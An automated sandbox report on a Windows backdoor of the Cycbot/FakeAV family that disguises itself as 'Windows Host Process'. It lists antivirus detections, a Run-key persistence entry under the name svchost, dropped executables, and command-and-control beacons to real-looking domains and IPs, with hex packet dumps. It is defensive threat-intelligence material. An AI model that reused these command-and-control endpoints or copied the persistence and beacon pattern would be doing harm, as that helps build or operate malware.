Analysis Date2014-08-13 21:27:47
MD507184d89c4f5ef1e2fab1bb4f5ca52d6
SHA1d3daad316cd95ec326125e4ad41becd112249cba

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 311eaa46bf9893ab86741a67e36b4fa6 sha1: aa77b6e75457a902b4bb6bdf798d50c22ff755db size: 94208
Section.rdata md5: 84e895dd7eb277abfeb05cdf925111f3 sha1: 1383978a10ee1c72c4a0edaa7e5c9f461ce227eb size: 9216
Section.data md5: 4a5b15fe0daca1d9f753f82f6dda67a2 sha1: 69cb711642d30ed9bdd549dbda23d68c93f3c01d size: 19456
Section.rsrc md5: 386de0882bcf35cfc883d21104597520 sha1: f8c0813b1ced2012c5ffbff4a01208ee8f6d9bf0 size: 1024
Timestamp2005-10-30 06:53:24
VersionPrivateBuild: 1285
FileDescription: Windows Host Process
PEhashaa87e144f6e5e715e88356c134ec8d92766bb9f2
IMPhashc9bb20376b97bec1866475838f2097a9
AV360 SafeGen:Heur.Conjar.2
AVAd-AwareGen:Heur.Conjar.2
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.B.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVCA (E-Trust Ino)Win32/FakeAV.S!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Agent-216454
AVDr. WebTrojan.DownLoader1.39237
AVEmsisoftGen:Heur.Conjar.2
AVEset (nod32)Win32/Kryptik.IPN
AVFortinetW32/FakeAV.BZD!tr
AVFrisk (f-prot)W32/Goolbot.B.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Heur.Conjar.2
AVGrisoft (avg)Cryptic.BHZ
AVIkarusPacked.Win32.Krap
AVK7Backdoor ( 003210941 )
AVKasperskyPacked.Win32.Krap.hy
AVMalwareBytesTrojan.Agent.Gen
AVMcafeeBackDoor-EXI.gen.d
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.2
AVNormandoslegacy/FakeDWM.C
AVRisingno_virus
AVSophosTroj/FakeAV-BZD
AVSymantecTrojan.Gen.2
AVTrend MicroBKDR_CYCBOT.SME
AVVirusBlokAda (vba32)BScope.FakeWare.xc
AVYara APTno_virus
AVZillya!Trojan.FakeAV.Win32.102063

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex{C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSzoneck.com
Winsock DNSwww.google.com
Winsock DNSdolbyaudiodevice.com
Winsock DNSmotherboardstest.com
Winsock DNS127.0.0.1
Winsock DNSzonejm.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Network Details:

DNSwww.google.com
Type: A
74.125.225.147
DNSwww.google.com
Type: A
74.125.225.148
DNSwww.google.com
Type: A
74.125.225.144
DNSwww.google.com
Type: A
74.125.225.145
DNSwww.google.com
Type: A
74.125.225.146
DNSzoneck.com
Type: A
208.79.234.132
DNSzoneck.com
Type: A
208.79.234.132
DNSprotectyourpc-11.com
Type: A
69.43.161.170
DNSzonejm.com
Type: A
192.241.157.178
DNSmotherboardstest.com
Type: A
209.222.14.3
DNSdolbyaudiodevice.com
Type: A
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://zoneck.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUDWpw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GEThttp://zoneck.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUDWpw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v47&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=main&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GEThttp://zoneck.com/images/im135.jpg?tq=gL4SK%2FSUh7zEpRMw9JGd5dGwJk6s0824xLMjS9rWwLWyxSE6qaKxpMa1C2m51bCwxrtXK%2B%2FbxUqRSfkIYUhF
User-Agent: gbot/2.3
HTTP GEThttp://zonejm.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvYi0ejbwvgS917X65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GEThttp://motherboardstest.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvYi0ejbwvgS917W65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v47&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err084&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v47&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err095_1_7&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v47&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err088_2_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v47&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err073_2_2&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GEThttp://motherboardstest.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvYi0ejbwvgS917X65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v47&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err084&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v47&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err095_2_5&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 74.125.225.147:80
Flows TCP192.168.1.1:1032 ➝ 74.125.225.147:80
Flows TCP192.168.1.1:1034 ➝ 208.79.234.132:80
Flows TCP192.168.1.1:1035 ➝ 208.79.234.132:80
Flows TCP192.168.1.1:1036 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1037 ➝ 208.79.234.132:80
Flows TCP192.168.1.1:1038 ➝ 192.241.157.178:80
Flows TCP192.168.1.1:1039 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1040 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1041 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1042 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1043 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1044 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1045 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1046 ➝ 69.43.161.170:80

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a                      */*....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a                      */*....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   342e6a70 673f7471 3d674b34 514b2532   4.jpg?tq=gK4QK%2
0x00000020 (00032)   46535568 377a4574 524d7739 594c5273   FSUh7zEtRMw9YLRs
0x00000030 (00048)   72436955 44577077 3861336e 4f514c61   rCiUDWpw8a3nOQLa
0x00000040 (00064)   626e5673 4d4c4570 6c733072 4e613178   bnVsMLEpls0rNa1x
0x00000050 (00080)   374b6a56 6a6e616f 4c653277 64636e4b   7KjVjnaoLe2wdcnK
0x00000060 (00096)   4b375168 25324657 52343063 25324232   K7Qh%2FWR40c%2B2
0x00000070 (00112)   4e665338 736d6957 6f4e4a25 32425168   NfS8smiWoNJ%2BQh
0x00000080 (00128)   68534555 25334420 48545450 2f312e30   hSEU%3D HTTP/1.0
0x00000090 (00144)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000a0 (00160)   6f73650d 0a486f73 743a207a 6f6e6563   ose..Host: zonec
0x000000b0 (00176)   6b2e636f 6d0d0a41 63636570 743a202a   k.com..Accept: *
0x000000c0 (00192)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000000d0 (00208)   67626f74 2f322e33 0d0a0d0a            gbot/2.3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   342e6a70 673f7471 3d674b34 514b2532   4.jpg?tq=gK4QK%2
0x00000020 (00032)   46535568 377a4574 524d7739 594c5273   FSUh7zEtRMw9YLRs
0x00000030 (00048)   72436955 44577077 3861336e 4f514c61   rCiUDWpw8a3nOQLa
0x00000040 (00064)   626e5673 4d4c4570 6c733072 4e613178   bnVsMLEpls0rNa1x
0x00000050 (00080)   374b6a56 6a6e616f 4c653277 64636e4b   7KjVjnaoLe2wdcnK
0x00000060 (00096)   4b375168 25324657 52343063 25324232   K7Qh%2FWR40c%2B2
0x00000070 (00112)   4e665338 736d6957 6f4e4a25 32425168   NfS8smiWoNJ%2BQh
0x00000080 (00128)   68534555 25334420 48545450 2f312e30   hSEU%3D HTTP/1.0
0x00000090 (00144)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000a0 (00160)   6f73650d 0a486f73 743a207a 6f6e6563   ose..Host: zonec
0x000000b0 (00176)   6b2e636f 6d0d0a41 63636570 743a202a   k.com..Accept: *
0x000000c0 (00192)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000000d0 (00208)   67626f74 2f322e33 0d0a0d0a 793e0a20   gbot/2.3....y>. 
0x000000e0 (00224)   2020203c 68333e54 68697320 69732074      <h3>This is t
0x000000f0 (00240)   68652072 65616c2d 6d6f6465 20746573   he real-mode tes
0x00000100 (00256)   74207061 67652e2e 2e3c2f68 333e0a09   t page...</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 37267379 7374656d   ype=g_v47&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d6d 61696e26 6e3d3026   status=main&n=0&
0x00000070 (00112)   65787472 613d3020 48545450 2f312e31   extra=0 HTTP/1.1
0x00000080 (00128)   0d0a486f 73743a20 70726f74 65637479   ..Host: protecty
0x00000090 (00144)   6f757270 632d3131 2e636f6d 0d0a5573   ourpc-11.com..Us
0x000000a0 (00160)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x000000b0 (00176)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x000000c0 (00192)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x000000d0 (00208)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x000000e0 (00224)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x000000f0 (00240)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000100 (00256)   73650d0a 0d0a2e2e 2e3c2f68 333e0a09   se.......</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   352e6a70 673f7471 3d674c34 534b2532   5.jpg?tq=gL4SK%2
0x00000020 (00032)   46535568 377a4570 524d7739 4a476435   FSUh7zEpRMw9JGd5
0x00000030 (00048)   6447774a 6b367330 38323478 4c4d6a53   dGwJk6s0824xLMjS
0x00000040 (00064)   39725777 4c577978 53453671 614b7870   9rWwLWyxSE6qaKxp
0x00000050 (00080)   4d613143 326d3531 62437778 7274584b   Ma1C2m51bCwxrtXK
0x00000060 (00096)   25324225 32466278 55715253 666b4959   %2B%2FbxUqRSfkIY
0x00000070 (00112)   55684620 48545450 2f312e30 0d0a436f   UhF HTTP/1.0..Co
0x00000080 (00128)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000090 (00144)   0a486f73 743a207a 6f6e6563 6b2e636f   .Host: zoneck.co
0x000000a0 (00160)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x000000b0 (00176)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000000c0 (00192)   2f322e33 0d0a0d0a 362e303b 2057696e   /2.3....6.0; Win
0x000000d0 (00208)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x000000e0 (00224)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x000000f0 (00240)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000100 (00256)   73650d0a 0d0a2e2e 2e3c2f68 333e0a09   se.......</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427659 6930656a 62777667 53393137   fBvYi0ejbwvgS917
0x00000040 (00064)   58363572 4a716c4c 66675069 57573163   X65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 656a6d2e 636f6d0d   ost: zonejm.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000a0 (00160)   2e330d0a 0d0a6570 743a202a 2f2a0d0a   .3....ept: */*..
0x000000b0 (00176)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000000c0 (00192)   2f322e33 0d0a0d0a 362e303b 2057696e   /2.3....6.0; Win
0x000000d0 (00208)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x000000e0 (00224)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x000000f0 (00240)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000100 (00256)   73650d0a 0d0a2e2e 2e3c2f68 333e0a09   se.......</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427659 6930656a 62777667 53393137   fBvYi0ejbwvgS917
0x00000040 (00064)   57363572 4a716c4c 66675069 57573163   W65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 206d6f74 68657262 6f617264   ost: motherboard
0x00000080 (00128)   73746573 742e636f 6d0d0a41 63636570   stest.com..Accep
0x00000090 (00144)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x000000a0 (00160)   6e743a20 67626f74 2f322e33 0d0a0d0a   nt: gbot/2.3....
0x000000b0 (00176)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000000c0 (00192)   2f322e33 0d0a0d0a 362e303b 2057696e   /2.3....6.0; Win
0x000000d0 (00208)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x000000e0 (00224)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x000000f0 (00240)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000100 (00256)   73650d0a 0d0a2e2e 2e3c2f68 333e0a09   se.......</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 37267379 7374656d   ype=g_v47&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 34266e3d   status=err084&n=
0x00000070 (00112)   30266578 7472613d 30204854 54502f31   0&extra=0 HTTP/1
0x00000080 (00128)   2e310d0a 486f7374 3a207072 6f746563   .1..Host: protec
0x00000090 (00144)   74796f75 7270632d 31312e63 6f6d0d0a   tyourpc-11.com..
0x000000a0 (00160)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x000000b0 (00176)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x000000c0 (00192)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x000000d0 (00208)   696e646f 7773204e 5420352e 31290d0a   indows NT 5.1)..
0x000000e0 (00224)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000f0 (00240)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000100 (00256)   6c6f7365 0d0a0d0a 2e3c2f68 333e0a09   lose.....</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 37267379 7374656d   ype=g_v47&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 355f315f   status=err095_1_
0x00000070 (00112)   37266e3d 30266578 7472613d 30204854   7&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a65 6374790a            /html>.ecty.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 37267379 7374656d   ype=g_v47&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 385f325f   status=err088_2_
0x00000070 (00112)   30266e3d 30266578 7472613d 30204854   0&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a26 69643d43 30353939   /html>.&id=C0599
0x000001a0 (00416)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x000001b0 (00432)   73746174 75733d6d 61696e26 6e3d3026   status=main&n=0&
0x000001c0 (00448)   65787472 613d3020 48545450 2f312e31   extra=0 HTTP/1.1
0x000001d0 (00464)   0d0a486f 73743a20 70726f74 65637479   ..Host: protecty
0x000001e0 (00480)   6f757270 632d3131 2e636f6d 0d0a5573   ourpc-11.com..Us
0x000001f0 (00496)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000200 (00512)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000210 (00528)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000220 (00544)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x00000230 (00560)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x00000240 (00576)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000250 (00592)   73650d0a 0d0a2e2e 2e3c2f68 333e0a09   se.......</h3>..
0x00000260 (00608)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000270 (00624)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000280 (00640)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 37267379 7374656d   ype=g_v47&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723037 335f325f   status=err073_2_
0x00000070 (00112)   32266e3d 30266578 7472613d 30204854   2&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
